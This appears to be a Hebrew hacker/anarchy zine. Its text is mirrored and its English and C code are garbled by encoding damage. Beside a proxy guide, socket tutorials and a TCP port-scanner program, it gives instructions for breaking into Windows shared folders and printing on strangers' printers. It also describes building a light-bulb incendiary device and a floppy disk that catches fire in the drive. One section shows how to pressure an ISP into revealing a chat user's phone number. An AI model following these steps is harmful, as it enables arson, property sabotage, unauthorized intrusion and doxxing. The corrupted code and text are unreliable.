!אמסיס םע םינגומ ויהי %ורפל םכנוצרב םהילאש םיבשחמה םיטעמ םירקמב $ת
$תויורשפא העברא םכל שי הזכ הרקמב
אמסיסה תא שחנל 0
.)תועש חקול( אמסיסה תא אצמיי הזש דע םלועב תורשפא לכ הסנתש הנכותב שמתשהל 0
החטבא רוח תרזעב אמסיסה תא ריסתש הנכות תרזעב אמסיסה תא %ורפל 0
.)תועש חקית תאז היצפוא םג( סודניוו תכרעמב םיפותישל אמסיסה תרדגהב אצמנש
.רחא בשחמ תוסנלו הזה בשחמה לע רתוול 0
.הנורחאל ורבעת זא םכל #לוה אל םא !הנושארה תורשפאה תא תוסנל %ילממ ינא
.םכלש הצירפה תאז !לכה ירחא יכ !םכל אבש #יאו !םכל אבש המ ושעת לבא
.םיפותיש קרוס אוצמל לוכי ינא הפיא $ש
$םימסרופמ םיקרוס לש תומש המכ הנה $ת
6gre
7egion
Nbtscan
0ir*'
$ןוגכ שופיח רתאב םהמ דחא ושפח טושפ altaVista%co4
..החלצהבו !ףרוצמה תוארוהה %בוק תא ואריק טושפ ןכלו !הנוש קרוס לכב שומישה
.%ורפה בשחמה לע תספדמב שמתשהל לכוא #יא $ש
.םיימעפ הילע וצחל !תפתושמ איה םגש תספדמ תאצמנ בשחמה לעש וארת םא $ת
!המייתסה תאז הלועפש ירחא .םכלש בשחמה לע םירביירדה תא ןיקתהל ושקבתת םתא
)םהלש וא םכלש בשחמה לע אצמנ אוה םא בושח אל( סיפדהל םכנוצרבש %בוקה תא ונמס
לע וצחל &trl s & לע וציחלו %ורפה בשחמה לע תספדמה תא ונמס תעכ ! &trl s 0 .
"""""""""""הההההההההההאאא - ב %ורפה בשחמה לש םישנאה תא %יפקתו לחת הספדהה
םימיוסמ םיבשחמ לע קר תדבוע איה לבא !קילדמ שממ היה הז !הצירפה לע יתבנגנ $ש
דירוהל ילב בשחמ לכל %ורפל לוכי ינא #יא .םלועב םיבשחמה לכל %ורפל הצור ינאו
.טנרטניאל רוביחו סודניוו םע ילש בשחמהמ הככ םאתס הנכות םוש
$ת -uck Lou
=9
.ינובשח לע לכה !םכל אבש המ לכ סורהלו םכל אבש ןאל %ורפל ישפוח ושיגרת
םכלש םוניהיג (
הרונמ תצצפ
.רואה תקלדה איה #ושח רדחל הסינכב תיטמוטוא הלועפ
.הרקייתה תרונמב המקומ הרונמ תצצפ םא ...ינלטק תויהל לוכי הז
הנכהל רתויב הלק איה הרונמ תצצפ
םייריכ וא #ותיר רעבמ םע סיסבה לש םומיח יע קוריפל תנתינ תיכוכזה תורונמהמ קלחב
.הרסהל ןתינ הז קיפסמ םח היהנ קבדהשכו חבטמ לש
.ןליטצאיסקוא רעבמ וא #ותיר רעבמ יע יתדוקנ םומיח שרדנ תורונה לש רחא קלחב
יולימל םינתינ םה רדחה תרוטרפמטל וררוק תיכוכזהו סיסבהש רחאל !םירקמהמ דחא לכב
.רחא רבד לכ וא הפירש קבא ומכ %פנ רמוחב
תיכוכזב רוח רצונ םאו !הרזח התוא קיבדהל םיבייח איה סיסבהמ הקתונ תיכוכזה םא
.םינפב %פנה רמוח תא רומשל ידכ קבד ריינב ותוא תוסכל םיבייח
הרונמה תיב #ותל הרונמה תא גירבהל אוה תושעל רתונש לכ ןכמ רחאל
)$ תוחיטב יעצמאכ רדחל למשחה תא םדוק קתנל יוצר(
יע הבתכנ הבתכה Rel8t .
=3
היכרנא
.היכרנא לש ןיינעה לכ תא ןוכנ אל םיניבמש 'םיטסיכרנא' לש םירקמ הברה ונל שי ןורחאה ןמזב
.דבלב םמצע תאו םמצע תא םיגציימ םה .םיטסיכרנא אל הלא יכ תואכרימב םיטסיכרנא יתבתכ
תושרה תא ונל ןתונ םצעב המ .היכרנאה ןכ הז המ ריבסתש הבתכ הפ בותכל יתיצר ןכלו
!םזילדנול
םמעשמש !תיבב םינמשה םידליה םכל תתל .םיאטבתמ םיטסיכרנאה ונא הבש תרחא #רד לכל וא
תיווזמ לכה תוארל !הלאה םילימה תא םיארוק ןכלו ןיינעמ והשמ תצק םיצורו םייחב םהל
.הנוכנה היארה
לש ןויערה לכ ירוחאמ תדמועש תמאה תא חסנל םעפ דועו םעפ דועו םעפ דוע יתיסינ !ןכבו
.היכרנאה
יתיצרש ומכ אצי אל הז יתבתכ #יאו יתבתכ המ הנשמ אל לבא .תוחפל התוא האור ינאש #יא וא
גיצה אלו
טרסה תא תוארל הז םכל דיגהל לוכי ינאש המ לכ ןכל .םתוא גיצי הזש יתיצרש ומכ םירבדה תא
"nt( .
רתויב הבוטה #רדהש הטילחמ רבד לש ופוסב הלמנהו !היכרנא לע רבדמ שממ אל טרסה יכ םא
!ןוטלש איה
העפשה שי דחא לכל רשאכ !ןוצר #ותמ תכרעמהמ קלח איה םעפהש אלא !תכרעמ #ותב םייחו
!רתוי הבוטו הקזח
טרסה !התצר הלמנהש ומכ יונב לכה םעפהו !שדחה ןוטלשהמ םיצורמ )תוחפל הארנ #כ( םלוכו
גיצמ ןיידע
!הז תא גיצהל הצור יתייהש ומכ הז תא גיצמ אל הז .היכרנא לש ןויערה תא תצק יהשלכ הרוצב
.טסיכרנאכ ילש םלועה תייאר תא ריבסהל ילש תונויסינה לכמ ףידע הז לבא
.טרסהמ ונהית
!םכלש GeHeNoM
=:
קסיד תצצפ
$םירמוח
טקסיד 8
םיירפסמ 8
)""הזה עבצב תויהל םיבייח( םילוחכ וא םינבל חבטמ ירורפג 8
םיינרופיצל הפוקש הכל 8
+ לש הלאכ( טקסידה תא תונידעב וחתפ . 3 .)תאז הרטמל םיבוט יכה הלעמו '%ינא
9 .םינפבמ הנתוכה תפיטע תא וריסה .
3 םירורפגה תא תיצת תכתמ !%עמ תדרגמב ושמתשה( תחלצ #ותל םירורפגהמ הקבא הברה ודרג .
).. םכתיא דחיב
: .טקסידה #ותב תובידנב התוא ורזפ !הקבא הברה םכל שיש ירחא .
= .םתרזיפש הקבאה לעמ הכלה תא וכפש .
J 9שבייתהל קסעל ונת .
N .)םתחתפש הפיא( םינפבמ ותוא רוגסל הכלב ורזעיהו קסידה תא הרזחב ורבח תוריהזב .
. 9םיבהוא דואמ םתאש והשימל טקסידה תא ונת .
סמיהל ידכ םוח קיפסמ( הנטק הפרש היהת טקסידה תא אורקל הסני ןנוכהשכש אוה הרקיש המ
םיניבמ אל םיאנכטהשכ האנהב ופצ .)"ןנוכה לש האירקה שאר תא קופדלו םיטקסידה ןנוכ תא
9בשחמה לע רבע המ
!סדנלודקמ תשר תא עגשל #יא !תוקד רשעב םדאנב טנפהל #יא $םיאבה היכרנאה יכירדמב
הסכיא .ינומכ םיבוט םידלי ויהת .אל !םאתס .רצחב הנאוחירמ לודיגל רתויב תובוטה תוטישהו
.היכרנא
!דימת תבהוא
.ידאלב
==
Port Scaning
ןןןןןללללללהא
.בבבבבבבצמה המ
ינא ללכ #רדב .גנינאקס טרופ %ירהל יתיצר .והשמ לע ופניא אוצמל יתיסינ תחא םעפ - הככ זא
תא יתישעש ירחא אוהה הרקמב לבא !)טנלט #רד( תינדי םיעודיה םיטרופל סנכיהל תוסנל תבהוא
חותפ טרופ הזיא שי םא תעדל !ללוכ גנינקס %ירהל יתיצר םיעודיה םיטרופל תינדיה הקידבה
.הדובעה תא יליבשב השעיש ריהמ והשמ יתבתכו !ילש רלייפמוקה תא יתילעה זא .רחא
תפשב הז( הפ דוקה תא םסרפא ינאש שקיב םוניהיג ...זא & אוהש ינפל היה הז .יתמסרפ הנה זא )
הזב ושמתשת לא !הרקמ לכב .וישכע דע הז תא םסרפ אל אוה המל תעדוי אלו רתאה תא בזע
-מ תוחפ קורסל קיפסה ישוקב אוה העש יצח ירחא( ףוריטב י-ט-י-א אוה יכ רנקס טרופכ =*
םימדוקה םיכירדמב יתסקסידש תוכומנה תומרב תונכתלו םיטקוסל בוט לוגרת הז לבא )םיטרופ
-ב יתבתכש והשמ הז !בושו = ידכ תושעל יתלוכיש םירבד הברה שיש ןוכנ זא .םייוסמ #רוצל תוקד
רפשל וא )האלולהמ תוארוה איצוהל !ליבקמב םיטקוס המכ חותפל( הלועפה תא תצק %יאהל
ב רבחתהל םג רשפאל( תצק התוא dns תבותכב קר אלו iI )המ םושמ יל #בתסמ דימת הז לבא
.חוכ יל היה אל לבא
ותוא וגישה( וילא רבחתהל םיצור םתאש יפייאה תא תשקבמ תאזה הנטקה הנכותה ןורקיעב
תרזעב netstat !a םיטרופל רבחתהל הסנמו ) +!+*9: הארוהל בל ומיש .יפייא ותוא לע Qor
XIortn+qIortr+*9:qIort )--
םיטרופה תא תקדובש +!+*9: .םירפסמה תא ונש טושפ !םירחא םירפסמ קודבל םכל אב םא .
תקרוס תחא רשאכ הנכותה תא םיימעפ %ירהל המגודל םג רשפא( +!=* תקרוס תחאו +!+**
םיטרופב טקוס תחיתפל השקב תחלוש הנכותה .)המודכו +!+*9: שי( בויחב תינענ השקבה םא .
.#סמה לע טרופה רפסמ תא תמשור הנכותה )טרופ ותואל תרשה לע הנזאה
ןיידע םתא תוקד רשע ירחא םא ולהבית לא זא )"דואמ לבא( י-ט-י-א ד-ו-א-מ הז !יתרמאש ומכ
.#סמה לע םולכ םיאור אל
$סוד ןולחב ודילקה !העיגה הנכותה טרופ הזיאל קודבל ידכ
netstat !a
בותכ ודילש טרופה .םכלצא םיחותפה םיטרופה לכ תא וארתו
3LNP3N#
.עגרכ רבחתהל הנכותה הסנמ וילא טרופה והז
ומכ ןיא ןיא ןיאש ןבומכ !םירלייפמוקל רשקב gcc שי !סודניוו לע םיעוקתש ינומכ םתא םא לבא
לש ףילחת lcc תרוצב יונבה רלייפמוק הזש gcc !ולש תוזירקה תא ול שי לבא !ןיוצמ רלייפמוק .
תאצוי שדח %בוק רוציל םיחילצמש דעו !םעפ לכב שדח טקייורפ חותפל #ירצ תינכות לכלו
.המשנה
# include rstdio%h >
# include rwinsock%h >
# include rwinsock39%h >
# include rwindows%h >
Void winsockPinitXVoid )
{
83"$"#" inQo ;
iQ X83"3tartuIXM"/86R$X+,+Y, &inQoY tn * )
MessageBo'XNM77, u&annot initiali(e 8in3ocktu, u83"3tartuIu,
MBP6/ ;)
}
=J
int 4ainXint argc,char iargV )][
{
winsockPinitXYq /i the windows intiali(ation stuQQ /* ...
int sockQd ;
int Iort ;
struct sockaddrPin destPaddr ;
char ,P[+J]q /i 8ill hold the ,P address we wish to connect to /*
printf("\nDestination IP ;(" ?
gets(IP ;(
*/ b(eroX&X4)Paddr%sinP(eroY,.Yqi/ /i wh) this doesnot work /* ??
Qor XIortn+qIortr+*9:qIort )++
{
sockQd n socketX"-P,N#,36&/P3#R"M,* ;)
destPaddr%sinPQa4il) n "-P,N# ;
destPaddr%sinPIort n htonsXIort ;)
destPaddr%sinPaddr%sPaddr n inetPaddrX,P ;)
iQ XconnectXsockQd, Xstruct sockaddr iY&destPaddr, si(eoQXstruct
sockaddrYY jn * )
{
IrintQXu<nldu, Iort ;)
*/ iQ connected successQull), return Iort nu4 /*
}
shutdownXsockQd,3Yq /i &lose the socket Qor sending and receiVing /*
}
IrintQXu&onnection closed ;)".
return *q /i Return a success Value /*
}
HaVe Qun !
!תבהוא
Bloody .
=N
תויצרקב $יתעמשמ$ לופי
.ילש םיחא םולש
.םירבג םהש ובשחי םכלש םירבחש ןטק קירט הנה
.אל ! בשחמל םכל %ורפל הסנמו %צרקתמש ןבצעמו קופד דלי הזיא ריכמ דחא לכ
.םכתא ןבצעמש רגפמ הזיא םתס וא
.טושפ
.יס רא יאב וא ויק יס יאב ותייא ורבדת
.סוד ןולח וחתיפ
ודילקה Netstat !a .
.ולש טסוהה תא וא יפ יאה תא ולג
.ןיוצמ הז ! יפ ייא םתאצמ םא
.יפ ייאל טסוה תכפוהה הנכות ודירוה ! טסוה תאצמ םא
ודילקה טושפ !יפייאל טסוה תכפוהה הנכות #ירצ אל $רנאר דאלבמ הרעה 000 netstat !an ידכ
000 )יפייא תרוצב ותנעי( תירמונ הרוצב תבותכה תא לבקל
.וישכע
.#סמה תיתחתב ןועשה לע ולכתסה
שמתשמ לש טנרטניאה תרבח תא ואצימ )םיטנגילטניא הפיט התא םא יפ יאה וא ( טסוהה יפל
.הז
.הלש ןופלטה רפסמ תא ומשירו ! תאזה טנרטניאה תרבח לש רתאל ושליג ! וישכע
$םיאבה םירבדה תא ורמיאו ! טנרטניאה תרבחל ורשקתה ! טעכ
...העשב %ורפל הסינ אוה.....אוה ולש יפ יאהו ..... בשחמל יל %ורפל הסינ והשימ עגרה .... רבדמ
.תויוטש םישועש םינטק םידלי םתס אל םינימא ועמשתו
$וישכע םשור ינאש המ תא בוט וארקת ! וישכע
""""""""""""שמתשמ ותוא לש ןופלטה תא םכל תתל תביוחמ טנרטניאה תרבח
...וישכע
........בשחמל יל %ורפל תיסינ המ ול ודיגתו...םדא ןב ותואל ורשקתת
)$
ןש ןיש
IceFire3k
=.
םימל תחתמ םישימש םירורפג
$םיכירצ םתא
לש הליבח- +* םינטק םיצפח הלא םא ןוכנה רבדה תא םתלביקש ועדת( ןוקיליס תודויד
)תיכוכזמ
םירורפג תליבח-
רנ-
ןוילעה קלחב רצוויהל הוועש לש הכירבל ונתו רנה תא וקילדה-
רורפגל ביבסמ הלש תווצקה דחא תא ופפלו תחא הקויד לש תיכוכזהמ קלחה תא ודימצה-
הצוחה הצקה תא ואיצוהו
םיפפולמ תויהל םיכירצ תווצקה ינש וישכע !דגונמ ןוויכב לבא ינשה הצקה םע רבד ותוא ושע
""""ינשב דחא םיעגונ אל לבא רורפגל ביבסמ
םימב דימע יוסיכ רצוויש #כ הוועשה תכירב #ותל רורפגה שאר תא וסינכה-
וצרתש הלאכ המכ וניכה-
לש הירטבל תרבוחמ הדוידהשכ- J הריבש חתמ ארקנש המל העיגמ איה !טלוו
סמנש(רואו םוח לש הלודג תומכ םיקיפמ םה !וז הדוקנל םיעיגמ םיינורטקלאה םיביכרה בורשכ
)ןטק םתכל דואמ רהמ
םיברסמ םירורפגה בורשכ( .םימל תחתמ ודבעיש םירורפגה תא תיצהל ידכ קיפסמ הזה םוחה
)$ קלדיהל
IceFire3k
=;
יסקורפ יתרש
$eath &o4es #o Ms "ll
lla 3halVi
.םירבחתמ םתא וילא רשא רתאל םירבחתמ םתא וכרד רשא תרש םצעב אוה יסקורפ תרש
....ררררמממממממממממווווווווווווווווווווולכ
וילעש תרשל םירבחתמ םתא םכלש טנרטניאה קפס #רדש הז הרוקש המ רתאל םיסנכנ םתאשכ
!רתאה ןסחואמ
מ יונב היה םעפש רתאה לש דוקה תא םכלש ןפדפדל ןתונ אוהו H#M7 אל הז םויהש תושעל המו
.הככ דימת
מ בכרומ םנמוא תויהל לוכי אוה םויה H#M7 ...ראשה ןיב היהי קר הז לבא !
תא ונל שי יכ -lash ה לכ תא וחכשת לאו הידמורקמ לש 3criIt 7anguages
םג שיו cgi ו asI תא לבקמ ןפדפדה !הרקמ לכב !בוט .'וכו
טמרופב רתאה Ht4l .#סמה לע םיאור םתאש המל הז תא םגרתמ כחאו
.הרוקש המ רתוי-וא-תוחפ הז
.רתוי רשאמ תוחפ רתוי
.תוחפ רשאמ רתוי תוחפ ינש דצמ וא
.בושח אל ..םצעב וא
תאז םישוע םתא !רתאה לא תורישי רבחתהל םוקמבש אוה יסקורפ תרשב שומישב הנושש המ
#רד
$םיירקיע םירבד ינשל םרוגש המ .יסקורפה תרש
+ )יולת( רתוי תיטיא ( רתוי הריהמ תורבחתה .
9 .תוימינונא .
.ת.ו.י.מ.י.נ.ו.נ.א !אל .תוימינונא !ןכ
.ןכ ןכ ןכ ןכ ןכ ןכ ןכ ןכ ןכ !אל !ןכ !אל !ןכ
.רתוי הריהמ תורבחתהל םרוג המ
אוה םכלש בשחמהש רמאנ ואוב !ןכבו " אוה עיגהל םיצור םתא וילאש רתאהו B .
בשחמהש ידכב " בשחמה םע רשק רוציל לכוי B #רד רבחתהל #ירצ אוה !רתאה אצמנ וילעש
אלמ אלמ
םיבשחמה יכ .הככ יכ .המל .םיבשחמ " ו B .תיפרגואיג הניחבמ דואמ םיקחורמ " אצמנ
!לארשיב
ו B זא .הקירמאב אצמנ " $האבה #רדה תא השוע
" ! - ! M ! & ! / ! # ! H ! ! G ! 6 ! 0 ! ! R ! M ! ! N ! # ! B
( הלאה םיבשחמה לכל רבחתהל #ירצ היה אוה !רמולכ QuckthegoVer4ent ל עיגה אוהש דע ) B .
!וישכע P #רד רבחתהל םוקמב יכ .המל .רהמ רתוי םשל עיגהל ונל רוזעי !ונלש יסקורפה תרש !
$אבה רבדה תא םישוע ונחנא םיבשחמ הברה #כ לכ
" ! - ! M ! & ! / ! P ! L ! B
ירחא !רמולכ Quck !דיחי בשחמל רבחתהל #ירצ היה רשא יסקורפ תרשל עיגה אוה ! L ידכב !
עיגהל
( יפוסה דעיל B בוביסה לכ תא תכלל םוקמבש וליאכ הז תא וניימד .#רדה לכ תא רציקש המ !)
רפס תיבהמ
תרשל םימעפלש ןבומכ .עצמאב םיכתוחו רוציק #רדב םישמתשמ םתא !הדוהי לש תלוכמל
יסקורפ
תא %אייש המ וב ושמתשת אל םא ורבחתת םהילא םיתרשל רשאמ רתוי ריהמ רוביח היהי
.רתוי דוע רוביחה
םורגיי קר יסקורפה תרש #רד רוביחש תויהל לוכי .הככ תויהל בייח אל הזש ןבומכ לבא
רתוי םיבר םירוביחל
J*
תיבל רשי תכלל םוקמבש וניימד הז תא ןיבהל ליבשב .#ילהתה לכ תא טאי #כבו רתוי םייטיאו
ילא לש
לכימ לש תיבה #רד רובעל םיכירצ םתא םדוק יכ בוביסה לכ תא תושעל וישכע םיכירצ םתא
םצעב איהש
.השוע איה המ וארת !לכימ לש אמיא סוכ .יטיאו #ורא רתוי היהנ לכה הללגבו יסקורפה תרש
.תמרוג תא המל ילכתסת !לכימ .הלש תיבה #רד רובעל רוסא
!תוימינונאל רשקב וישכע
.תרשל טלקנ םכלש יפ ייאה רפסמ !תורישי !הליגרה #רדב רתאל םירבחתמ םתאשכ
"""םוקמב טלקנ יסקורפה לש יפ ייאה רפסמ !יסקורפה תרש #רד םירבחתמ םתאשכ לבא
.םכל אב םא םיבוהצ םגו םילוחכו םימודאו םיבורמו םיבר םירקמב ליעי תויהל לוכי הז
.יפ ייא הז המ לבא
תבותכ לבקמ םכלש בשחמה טנרטניאל םירבחתמ םתאש םעפ לכ ,P .
,P ל רוציק םצעב הז ,nternet Protocol .עדימה תרבעהל יארחאש לוקוטורפ ותוא !
ןיעמ הז יפ ייא תבותכ וא יפ ייא רפסמ !ןכש המ .תעדל םיכירצ אל םתא הז תא לבא
תבותכ טנרטניאל םירבחתמ םתאש םעפ לכ !ליגר םדומ רוביחב .םכלש בשחמה לש יוהיז רפסמ
!לחתהה טירפת לע וצחל הז עגרב םכלש יפ ייאה תבותכ המ קודבל ידכב .הנתשת םכלש יפ ייאה
$ודילקהו הלעפהב ורחב winiIcQg
ה שקמ לע וצחל nter .עיפוי שדח ןולחו
ה לש הביתב ולכתסה ,P "ddress .הדוקנב םידרפומ םירפסמ העברא הב ועיפוי .
היהת תבותכה !טנרטניאל עגרכ םירבוחמ םכניא םא +9N%*%*%+
רבכ רבחתהל םיתמ חטב םתא !יסקורפה יתרש לע ילש םילוביזה לכ תא םתארקש ירחא !וישכע
.דחאל
םכל שי רבכ דוע המ לבא הז תא אורקל םכל אב אל רבכו !םומעשמ םיתמ חטב םתא !תמאה תא
.וישכע תושעל
( ררולפסקא טנרטניאמ !הרקמ לכב ,nternet 'Ilorer טירפתה תא ורחב !) #ools ורחבו
ב ,nternet 6Itions $הלעמל םיטירפת השיש םע #סמה לע שדח ןולח םכל חתפיי .
General, 3ecurit), &ontent, &onnections, Progra4s, "dVanced
ה טירפת לע רבכעה םע וצחל &onnections .
... וילע בותכש רותפכ ושפיח וישכע 3ettings
.רותפכה לע וצחל
םילימה תא בותכש הפיא ושפח Pro') 3erVer .
בותכ הבש תחתמ הביתהש וגאדת Mse a Iro') serVer .תנמוסמ היהת
.הטמל טסקטה תובית ינש תא אלמל קר םכל ראשנ תעכ .וישכע התוא ונמס !תנמוסמ אל איה םא
איה הנושארה הביתה "ddress .יסקורפה תרש תבותכ תא םיבתוכ םתא הפ .
איה ונלש האבה הביתה Port .חותפ יסקורפה תרש ובש טרופה רפסמ תא םיבתוכ םתא ןאכ .
היהי כדב הז .*.* וא .*** .אקווד ואל שממ שממ לבא
ה רותפכ לע םיצחול טושפ םתא הלאה תוביתה ינש תא םיאלממ םתאש ירחא 6/ .
ה רותפכ לע םעפ דוע וצחל !בושו 6/ .
.חותפ אוה טרופ הזיאב םיעדוי םתא #יאו .יסקורפ תרש םיאצומ םתא לזאזעל הפיא זא
וחמשי םהש חוטב ינא .םתוא ולאשת !יסקורפ תרש היהי םכלש טנרטניאה קפסל כדב !ןכבו
.רוזעל
$אוה יסקורפה תרש !אמגודל ימואלניב קזבב םישמתשמ םתא םא Iro')%be(eOint%net
$אוה טרופה רפסמו .*.*
יתרש םימסרפמה םירתא יפלא שי הזמ %וח
$םה הלאכ םירתא ינש .בחרה רוביצל םיחותפה יסקורפ
httIh//Iro')s:all%cgi%net/Iublic%sht4l
J+
httIh//tools%rosinstru4ent%co4/cgi!bin/QI%Il/showlinesplinesn9**&sortorn3
אורקל רשפא ללכב םא( םדאנב לש ארח התוא בתכ לבא הבתכ לש ארח תצק אציש עדוי ינא .והזו
!)םדאנב יל
.םתיפיצ המל זא
!)םייק אלש( םיהולא לש !ילש אתבס לש !ילש אבס לש !ילש אבא לש !ילש אמיא לש !םכלש
!ילש תודידיו !ילש םידידיו !ילש םירבחו !ילש הרבח לש !םלועה לש !ןוטלשה לש !הנידמה לש
!ילש אלש המ לכו !ילשש המ לכ לשו !ילש בשחמה לש
GeHeNoM
J9
:ןושאר קלח :םיבשחמ תויורשקתה
רברס תונבל ךיא
)ןייטשנייא( םוטמטהו םוקיה $םייפוסניא םה םירבד ינש
$הככ זא בוט
באסב וא סאבטנב םישמתשמש םכומכ םיער םישנאל וא םיליחתמל תדעוימ אל תאזה הבתכה N
ועדתש קר !לכ םדוק זא .םיבינגמ םירקאה םהש שיגרהל ידכ הלאכ םיקופד םירבדב וא
היהנ ואוב .תונכותב םישמתשמ םכומכ םישנאש ללגב םימייק אלו טעמכ םיבינגמ םירקאהש
.ותוא תנכתנ ' טייולפסקא דירוהל םוקמבו םימכח רתוי
..הפ אורקל קיספה אלש ימל לכ םדוק .דעוימ ןכ הזה #ירדמה ימל זא  וישכע תכלוה אל ינא
תפש םכתא דמלל & סיסבה תויהל לוכי הז !יסיסב וליפא !הפשב עדי םכל שי םא לבא !הככ יכ
.דיתעב םיטייולפסקא תביתכל
דוע ינאש הככ זא .הפ יתבתכ אשונה לע תעדוי ינאש המ יכ ידמ רתויל ינממ ופצת לא השקבב !ייה
9אובי הז םג !לבא !טייולפסקא תונבל #יא םכתא דמלל הלוכי אל
$ןיינעל הללאי
הנבמ תא םירכוז N לש תובכשה 63, לש סיסבה . #&P/,P תושעל םיכלוה ונחנאש המ זא !ןכ םא .
הז וישכע low leVel Irogra44ing אל .יתוא םתדביא .רתוי תוכומנה תומר שולשב תונכת הזש
.עגרכ בושח הזכ אל הז !ארונ
#רד .םהיניב םירשקתמ םיבשחמ םצעב #יא זא sockets .
socket תחיתפל םרוג !טנרטניאב םישוע םתאש המ לכ .היצמרופניא תרבוע וכרדש עקש ןמ הז
תויורשקתה sockets $סודב הדוקפה תרושב םיבתוכ םתאש חיננ . telnet +=J%NJ%++;%N 93
הזה הרקמב( שקובמה יפייאה לע םצעב +=J%NJ%++;%N ( הנכות ןמ תאצמנ ) dae4on הכחמש )
הזה הרקמב( טרופ ותואל רבחתהל שקבמ והשימש עגרב .תורשקתהל 93 אוה הנכותה דיקפת )
.ןתונ אוהש תודוקפ לע ביגהלו תורשקתהה תא ול רשאל
( הנזאה בצמב אצמנש בשחמ listening וא תרש ארקנ !תוסנכנ תויורשקתהל ) serVer .
וא חוקל ארקנ תרשל תודוקפו תורשקתהל השקב חלוש הזה הרקמבש !םכלש בשחמה client .
רגוס תרשה וא חוקלהש דעו !תורבחתהל השקב חלוש חוקלהש עגרהמ !םהיניבש תורשקתהה לכ
...#רד תישענ תורשקתהה תא
sockets )$ ""
.#רטצא ינא תודוקפ הזיא !תרש תנכות תונבל הצור ינאש חיננ .קמועל רתוי תצק סנכנ ואוב
ה לש לוחתא תודוקפ לכ םדוק sockets ןפואב תויולתש !תומיוסמ תורדגה םכותל סינכא ינאש
לש לוחתא תויצקנופ םג #רטצנ .ילש תורשקתהה winsock םע םידבוע ונחנא םא windows;' .
$זודניווב םיטקוסה לש לוחתאה תדוקפ תאז
83"$"#" inQoq
iQ X83"3tartuIXM"/86R$X+,+Y, &inQoY tn *Y
MessageBo'XNM77, u&annot initiali(e 8in3ocktu, u83"3tartuIu,
MBP6/Yq
הנבמה לש )םיטנמוגרא( םיעפומ רוצינ וישכע sockadrrPin $טקוסה תורדגה תא ליכמש
struct sockaddrPin 4)Paddr, r4tPaddrq
$#כ הארנ הנבמה
struct sockaddrPin
J3
v
short int sinPQa4il)q /i "ddress Qa4il) i/
unsigned short int sinPIortq /i Port nu4ber i/
struct inPaddr sinPaddrq /i ,nternet address i/
unsigned char sinP(ero[.]q /i 3a4e si(e as struct sockaddr i/
wq
struct inPadrr
v
unsigned long sPaddrq
wq
לש םיעפומ רוציל טושפ הז תושעל םיכירצ ונחנאש המ .ונתוא ןיינעל #ירצ אל הז הרקמ לכב
.תורדגהה תא וליכיש הנבמה
$ןתוא סינכנ
4)Paddr%sinPQa4il) n "-P,N#q
4)Paddr%sinPIort n htonsXMLP6R#Yq
4)Paddr%sinPaddr%sPaddr n ,N"$$RP"NLq
םיסינכמ ונחנא הינשה הרושב .טנרטניאה םע דובעל םיצור ונחנאש ול העידומ הנושארה הרושה
היצקנופה( טרופ ול htons םיטקוסש ומכ !םיטיב לש הנוש רדסל טרופה תא םגרתל ידכ הז
)ונלש בשחמה ותנעי( לאקולה הז הזה הרקמב !יפייא םיסינכמ ונחנא תישילשה הרושב .)םיבהוא
.הנזאהל כחא חתפנ ונחנאש ,N"$$RP"NL סינכהל הצרנ םא .יפייא לאקולה תא אצומ
םכילע תכמוס ינא ןכלו יפייאב תולפטמש תודוקפ המכ שיו !דודיקה תא רימהל #רטצנ רחא יפייא
.לכה בותכ םש !תילגנאב #ירדמה תא וארקתש
סופיט הז( םיטקוס המכ רידגנ integer $)ליגר
int socklstn, sockrcVdq
socklstn n socketX"-P,N#,36&/P3#R"M,*Yq
תרחא !)תויורשקתהל הכחי( ןיזאי תרשהש םיצור ונחנא טרופ הזיא לע ול רידגהל ןבומכ #רטצנ
ילמודנר טרופ הזיא לע בשי םתס אוה%
bindXsocklstn,Xstruct sockaddr iY&4)Paddr, si(eoQXstruct sockaddrYYq
socklstn ( !שקובמה טקוסה הז struct sockaddr iY&4)Paddr תושעל #ירצש הרמה תאז
לש הנבמהמ sockarrPin הנבמל sockaddr יכ !וינפל היהש & הנבמב הריכמ אל sockaddrPin .
הנבמה לש לדוגה אוה ןורחאה רטמרפה sockaddr .
קרש רידגהל רשפא !המגודל .רשפאי תרשהש םיצור ונחנא תויורשקתה המכ דיגהל םג #ירצ :
חוקלש עגרב .תויורבחתה רתוי ריתמ אל תרשה כחא .תרשל רבחתהל שקבל ולכוי תוחוקל
( .רבחתהל לוכי אבה חוקלה !תרשהמ קתנתמ -irst ,n -irst 6ut )
עידונ !תאזכ תחא םיאצומ ונחנא םא .תוחוקל תושקבל םיניזאמ ונחנאו ןכומ לכה וישכע זא בוט
.השקבה תא לבקיש תרשל
listenXsocklstn, B"&/76GYq
socklstn ו !ןיזאמ אוה טקוס הזיאל הז backlog .רתומה תויורשקתהה רפסמ אוה
.התייא םישוע המ .השקב הלבקתה
sinPsi(e n si(eoQXstruct sockaddrPinYq
sockrcVd n acceItXsocklstn, &r4tPaddr, &sinPsi(eXq
J:
הנבמה לש לדוגה טושפ איה הנושארה הרושה sockaddrPin .הכירצ הינשה הרושהש
ב הלבקתהש השקבה תא תלבקמ הינשה הרושה socklstn% R4tPaddr עיבצמ גוסמ הנתשמ הז
.תורבחתה תשקבמש תבותכה לש םיטרפה תא ליכיש
#ותל תסנכנ תאזה השקבה לכ sockrcVd ( דחא טקוס לע ןיזאמ תרשהש הז !םצעב הרוקש המ .
socklstn ( רחא טקוס חתופ אוה השקב שיש עגרב לבא ) sockrcVd המ לכ .התוא לבקל ידכ )
#רד רובעי םהיניב רבעויש sockrcVd """
לע ןיזאהל #ישממ תרשה socklstn אוה )ונרתה תושקב המכ יולת( תרחא השקב אובת םא """
.האלה ןכו השקב התואל רחא טקוס חתפי
.םהינש ןיב היצמרופניא ריבעהל ליחתהל רשפא השקבה תא לביק תרשהש עגרמ !והז
$דואמ טושפ !םיטקוסה תא רוגסל םיצור םא
shutdownXsocklstn,3Y
$וא
closeXsocklstnYq
' תוריזחמ תודוקפה לכ ' ןייצל בושח + תא תוליעפמו !האיגש לש הרקמב errno .
.תודוקפה לכ תא טרפמש תילגנאב #ירדמה תא אורקל דואמ יאדכ .הרצקב דואמ .םייתנבל והז
!םכלש
Zero Cool, AKA Blood Runner.
J=
:ינש קלח :םיבשחמ תויורשקתה
ניילק תונבל ךיא
: If man is one, and devil is six, then that must make me seven .;
)סיב ןחלוש לע תבותכ(
ואוב .םדוקה קלחה תא ודרשש הלא תוחפל וא .ילש םירקיו םיקותמ םיארוק םכל ןןןןלהא
.#ישמנ  םירקאה סנכ #רעיי הנשה םג יכ םכל רשבל החמש ינא ' תוווושדח !לכ םדוק זא
